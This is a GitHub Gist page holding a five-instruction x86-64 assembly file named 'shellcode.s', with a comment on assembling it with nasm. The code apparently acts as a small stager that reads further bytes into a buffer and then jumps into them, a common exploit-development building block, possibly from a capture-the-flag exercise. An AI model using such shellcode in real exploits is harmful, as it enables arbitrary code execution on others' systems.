Last active
October 11, 2016 20:31
-
-
Save chrysh/2202afe7ae23875d3b776d3078bf91e4 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
BITS 64 | |
pop rdx | |
pop rdi | |
mov rsi, rbp | |
syscall | |
call rbp | |
; nasm shellcode.s -o shellcode && hd shellcode |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment